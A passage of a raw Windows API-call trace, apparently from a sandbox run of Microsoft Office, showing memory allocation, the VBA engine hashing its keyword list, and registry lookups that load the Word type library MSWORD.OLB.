(This=0x7feffc15380, cb=0x20) returned 0x68e9880 [0041.221] IMalloc:Alloc (This=0x7feffc15380, cb=0x80) returned 0x6b9f700 [0041.221] IMalloc:Realloc (This=0x7feffc15380, pv=0x6b9f700, cb=0x280) returned 0x6c24c10 [0041.221] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6c13fe0 [0041.221] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6c13ff0 [0041.221] VirtualAlloc (lpAddress=0x0, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x5060000 [0041.221] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x2000, flProtect=0x4) returned 0x5a20000 [0041.221] CExposedDocFile::CreateStream () returned 0x0 [0041.221] IMalloc:Alloc (This=0x7feffc15380, cb=0x420) returned 0x6ca8b10 [0041.221] CExposedStream::AddRef () returned 0x2 [0041.221] CExposedStream::Release () returned 0x1 [0041.221] CExposedStream::Release () returned 0x0 [0041.221] IMalloc:Free (This=0x7feffc15380, pv=0x6ca8b10) [0041.221] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="0") returned 0x101047 [0041.222] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x30) returned 0x6889870 [0041.222] VirtualAlloc (lpAddress=0x0, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x5a60000 [0041.222] VirtualAlloc (lpAddress=0x5a20000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x5a20000 [0041.222] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Abs") returned 0x1072bc [0041.222] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Access") returned 0x101d98 [0041.222] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AddressOf") returned 0x10e252 [0041.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Alias") returned 0x10bf6d [0041.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="And") returned 0x107469 [0041.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Any") returned 0x10747a [0041.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Append") returned 0x108f83 [0041.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Array") returned 0x109183 [0041.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0041.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Assert") returned 0x1096e9 [0041.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="B") returned 0x101059 [0041.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Base") returned 0x10afa9 [0041.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BF") returned 0x105ca5 [0041.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Binary") returned 0x1008a0 [0041.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Boolean") returned 0x10978e [0041.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByRef") returned 0x1074ef [0041.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Byte") returned 0x101a83 [0041.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByVal") returned 0x1089c5 [0041.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Call") returned 0x10744b [0041.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Case") returned 0x107547 [0041.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CBool") returned 0x104c74 [0041.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CByte") returned 0x106d3c [0041.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CCur") returned 0x108050 [0041.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDate") returned 0x108dc3 [0041.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDec") returned 0x10834a [0041.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDbl") returned 0x1082e4 [0041.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDecl") returned 0x10a0b9 [0041.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ChDir") returned 0x10b2fb [0041.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CInt") returned 0x109f65 [0041.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Circle") returned 0x103fd1 [0041.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CLng") returned 0x10af63 [0041.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Close") returned 0x1005ab [0041.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Compare") returned 0x10af82 [0041.223] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Const") returned 0x10517a [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CSng") returned 0x10d4d2 [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CStr") returned 0x10d5bb [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CurDir") returned 0x101bab [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CurDir$") returned 0x10f7cc [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CurDir") returned 0x101bab [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CVar") returned 0x10e307 [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CVDate") returned 0x10cfd6 [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CVErr") returned 0x108902 [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Currency") returned 0x10f106 [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Database") returned 0x10eec7 [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Date") returned 0x103b0a [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Date$") returned 0x1031c7 [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Date") returned 0x103b0a [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Debug") returned 0x10eaee [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Decimal") returned 0x1036dd [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Declare") returned 0x104a38 [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefBool") returned 0x1091ad [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefByte") returned 0x10b275 [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefCur") returned 0x10cc45 [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefDate") returned 0x10d2fc [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefDec") returned 0x10cf3f [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefDbl") returned 0x10ced9 [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefInt") returned 0x10eb5a [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefLng") returned 0x10fb58 [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefObj") returned 0x10096b [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefSng") returned 0x102088 [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefStr") returned 0x102171 [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefVar") returned 0x102ebd [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dir") returned 0x1083c9 [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dir$") returned 0x106567 [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dir") returned 0x1083c9 [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Do") returned 0x105cf8 [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DoEvents") returned 0x109634 [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Double") returned 0x100d99 [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Each") returned 0x10fe75 [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Else") returned 0x103b56 [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ElseIf") returned 0x10f307 [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Empty") returned 0x10f4f1 [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EndIf") returned 0x1078bd [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Enum") returned 0x10465a [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Eqv") returned 0x108a4e [0041.224] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Erase") returned 0x1080da [0041.225] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error") returned 0x10db3c [0041.225] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error$") returned 0x10cf60 [0041.225] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error") returned 0x10db3c [0041.225] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Event") returned 0x10ac4b [0041.225] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0041.225] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Explicit") returned 0x10edcb [0041.225] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="F") returned 0x10105d [0041.225] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0041.225] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Fix") returned 0x108e81 [0041.225] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="For") returned 0x108f59 [0041.225] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Format") returned 0x102337 [0041.225] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Format$") returned 0x10efc7 [0041.225] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Format") returned 0x102337 [0041.225] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FreeFile") returned 0x10483a [0041.225] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Friend") returned 0x10bd1c [0041.225] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0041.225] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Get") returned 0x109342 [0041.225] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Global") returned 0x10f88f [0041.225] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Go") returned 0x105d67 [0041.225] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GoSub") returned 0x10b425 [0041.225] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GoTo") returned 0x10d70b [0041.225] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0041.225] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Imp") returned 0x109f18 [0041.225] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Implements") returned 0x10a988 [0041.225] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="In") returned 0x105db0 [0041.225] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Input") returned 0x10022a [0041.225] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Input$") returned 0x107767 [0041.225] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Input") returned 0x10022a [0041.225] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InputB") returned 0x107785 [0041.225] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InputB$") returned 0x100c59 [0041.225] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InputB") returned 0x107785 [0041.225] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InStr") returned 0x10120e [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InStrB") returned 0x10c2fb [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Int") returned 0x109f41 [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Is") returned 0x105db5 [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LBound") returned 0x101e0b [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Len") returned 0x10adf9 [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LenB") returned 0x107cfb [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Let") returned 0x10adff [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Lib") returned 0x10ae81 [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Like") returned 0x1091f3 [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Line") returned 0x109262 [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LINEINPUT") returned 0x1008f1 [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Load") returned 0x10b096 [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Local") returned 0x10353f [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Lock") returned 0x10b0e7 [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Long") returned 0x10b27a [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Loop") returned 0x10b2a8 [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LSet") returned 0x10c69e [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Me") returned 0x105e3b [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid") returned 0x10b3dc [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid$") returned 0x10566d [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid") returned 0x10b3dc [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MidB") returned 0x10568b [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MidB$") returned 0x102a70 [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MidB") returned 0x10568b [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mod") returned 0x10b4ba [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module") returned 0x101ee1 [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Name") returned 0x10f2f0 [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="New") returned 0x10b8b3 [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Next") returned 0x1009bb [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Not") returned 0x10ba23 [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Nothing") returned 0x105f21 [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Null") returned 0x105d87 [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Object") returned 0x102ec1 [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="On") returned 0x105e8e [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Open") returned 0x100767 [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Option") returned 0x10f982 [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Optional") returned 0x10675a [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Or") returned 0x105e92 [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Output") returned 0x10f959 [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ParamArray") returned 0x105941 [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Preserve") returned 0x10a5fc [0041.226] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Print") returned 0x10f00d [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Private") returned 0x1073c3 [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Property") returned 0x10d2f6 [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PSet") returned 0x10dd55 [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Put") returned 0x10c5b3 [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RaiseEvent") returned 0x10274a [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Random") returned 0x10f428 [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Randomize") returned 0x10ab02 [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Read") returned 0x101d0f [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ReDim") returned 0x10eea8 [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Rem") returned 0x10ce0e [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Resume") returned 0x10728b [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Return") returned 0x1038eb [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RGB") returned 0x10ce4d [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RSet") returned 0x106891 [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Scale") returned 0x10e596 [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Seek") returned 0x10e387 [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Select") returned 0x10cabd [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Set") returned 0x10d36e [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sgn") returned 0x10d3b2 [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Shared") returned 0x10479e [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Single") returned 0x10a99f [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Spc") returned 0x10d4f4 [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Static") returned 0x1029c6 [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Step") returned 0x103384 [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Stop") returned 0x1034f6 [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="StrComp") returned 0x10274d [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String$") returned 0x10c31c [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tab") returned 0x10d821 [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Text") returned 0x10abed [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="To") returned 0x105f48 [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Type") returned 0x100007 [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="TypeOf") returned 0x101832 [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UBound") returned 0x10ea71 [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unload") returned 0x104e44 [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unlock") returned 0x104e95 [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unknown") returned 0x10a11d [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Until") returned 0x10ecec [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Variant") returned 0x108738 [0041.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Wend") returned 0x1035a7 [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="While") returned 0x10a25c [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Width") returned 0x104e68 [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="With") returned 0x104bed [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WithEvents") returned 0x10f2eb [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Write") returned 0x105c2e [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Xor") returned 0x10ef9b [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#Const") returned 0x10f8c9 [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#Else") returned 0x1050dd [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#ElseIf") returned 0x10e5b5 [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#End") returned 0x10d478 [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#If") returned 0x10d383 [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Base") returned 0x109fb8 [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Control") returned 0x10a946 [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Creatable") returned 0x101d92 [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Customizable") returned 0x10c26d [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Description") returned 0x1009d0 [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Exposed") returned 0x1030b3 [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Ext_KEY") returned 0x10a88e [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_HelpID") returned 0x103e41 [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_Func") returned 0x10c92c [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_Property") returned 0x107f4a [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_PropertyPut") returned 0x106658 [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_PropertyPutRef") returned 0x105b25 [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_MemberFlags") returned 0x108db7 [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Name") returned 0x10e2ff [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_PredeclaredId") returned 0x105fc7 [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_ProcData") returned 0x107005 [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_TemplateDerived") returned 0x109f1e [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarDescription") returned 0x103303 [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarHelpID") returned 0x10a3b6 [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarMemberFlags") returned 0x10b6ea [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarProcData") returned 0x101b0c [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_UserMemId") returned 0x107b95 [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarUserMemId") returned 0x104d5f [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_GlobalNameSpace") returned 0x10ce77 [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName=",") returned 0x101043 [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName=".") returned 0x101045 [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="\"") returned 0x101039 [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_") returned 0x101076 [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CLngPtr") returned 0x105ab0 [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefLngPtr") returned 0x1036f2 [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PtrSafe") returned 0x106f4a [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CLngLng") returned 0x104463 [0041.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefLngLng") returned 0x1020a5 [0041.229] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LongLong") returned 0x10378e [0041.229] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LongPtr") returned 0x10d4e8 [0041.229] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="0") returned 0x101047 [0041.229] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="0") returned 0x101047 [0041.229] StringFromGUID2 (in: rguid=0x691f350*(Data1=0x20905, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x186a20, cchMax=39 | out: lpsz="{00020905-0000-0000-C000-000000000046}") returned 39 [0041.229] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x1866e0 | out: phkResult=0x1866e0*=0xa12) returned 0x0 [0041.229] RegOpenKeyW (in: hKey=0xa12, lpSubKey="{00020905-0000-0000-C000-000000000046}", phkResult=0x1866d8 | out: phkResult=0x1866d8*=0xa0e) returned 0x0 [0041.229] RegEnumKeyW (in: hKey=0xa0e, dwIndex=0x0, lpName=0x186708, cchName=0xa | out: lpName="8.7") returned 0x0 [0041.230] wcscpy_s (in: _Destination=0x1866f0, _SizeInWords=0xa, _Source="8.7" | out: _Destination="8.7") returned 0x0 [0041.230] RegOpenKeyW (in: hKey=0xa0e, lpSubKey="8.7", phkResult=0x186798 | out: phkResult=0x186798*=0xa1e) returned 0x0 [0041.230] _ultoa_s (in: _Val=0x409, _DstBuf=0x186710, _Size=0xa, _Radix=16 | out: _DstBuf="409") returned 0x0 [0041.230] RegOpenKeyA (in: hKey=0xa1e, lpSubKey="409", phkResult=0x186700 | out: phkResult=0x186700*=0x0) returned 0x2 [0041.230] _ultoa_s (in: _Val=0x9, _DstBuf=0x186710, _Size=0xa, _Radix=16 | out: _DstBuf="9") returned 0x0 [0041.230] RegOpenKeyA (in: hKey=0xa1e, lpSubKey="9", phkResult=0x186700 | out: phkResult=0x186700*=0x0) returned 0x2 [0041.230] RegOpenKeyA (in: hKey=0xa1e, lpSubKey="0", phkResult=0x186700 | out: phkResult=0x186700*=0xa22) returned 0x0 [0041.231] RegOpenKeyW (in: hKey=0xa22, lpSubKey="win64", phkResult=0x186708 | out: phkResult=0x186708*=0xa2a) returned 0x0 [0041.231] RegCloseKey (hKey=0xa2a) returned 0x0 [0041.231] RegCloseKey (hKey=0xa22) returned 0x0 [0041.231] _ultow_s (in: _Value=0x0, _Buffer=0x1867a0, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0041.231] RegOpenKeyW (in: hKey=0xa1e, lpSubKey="0", phkResult=0x186778 | out: phkResult=0x186778*=0xa1a) returned 0x0 [0041.231] RegQueryValueW (in: hKey=0xa1a, lpSubKey="win64", lpData=0x1867c0, lpcbData=0x186774 | out: lpData="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB", lpcbData=0x186774) returned 0x0 [0041.232] wcscpy_s (in: _Destination=0x186af0, _SizeInWords=0x104, _Source="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Destination="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0041.232] RegCloseKey (hKey=0xa1a) returned 0x0 [0041.232] RegCloseKey (hKey=0xa1e) returned 0x0 [0041.232] RegCloseKey (hKey=0xa0e) returned 0x0 [0041.232] RegCloseKey (hKey=0xa12) returned 0x0 [0041.232] LoadTypeLib (in: szFile="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB", pptlib=0x186778*=0x0 | out: pptlib=0x186778*=0x6992850) 